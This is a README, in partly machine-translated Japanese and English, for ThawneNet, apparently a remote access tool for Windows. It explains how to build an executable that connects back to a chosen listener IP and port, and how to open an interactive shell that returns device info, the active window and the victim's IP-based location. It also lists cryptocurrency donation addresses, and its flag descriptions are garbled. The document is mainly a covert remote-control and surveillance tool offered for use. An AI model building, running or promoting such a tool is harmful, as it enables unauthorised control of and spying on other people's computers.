ThawneNet
1.0.0
Thawnenetは、Windowsシステムの制御をリモートで制御し、そこから情報を取得するために設計されたツールです。 Thawnenetは、クライアント側のPython Windowsで開発されたクライアント/サーバーアプリケーションであり、サーバーもPythonにあります。

Thawnenetにはpython3が必要です
git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.
### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device
buildモード使用法:python3 server.py - build
shellモード使用法:python3 server.py -shell [flags]フラグ:-i、-pip listner ip address -p、 - port listnerポート番号
shellモードを実行すると、デバイスの通訳が取得されます
通訳で実行できるコマンド
info --> returns basic info of the device
activeWindow --> returns active window
battery --> returns battery info
whois --> returns the ip, city, country etc of the device
clear --> clears the screen
exit --> exit the interpreter
目的のIPとポートを使用してEXEを構築するには: python3 server.py --build
インタープリターを取得するには: python3 server.py --shell -i 0.0.0.0 -p 8000

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
xmrt: 0xF978FE35d00A201eB48aB3908993e14f312001a2
Thawnenetは、MITライセンスに基づいてライセンスされています。詳細については、ライセンスをご覧ください。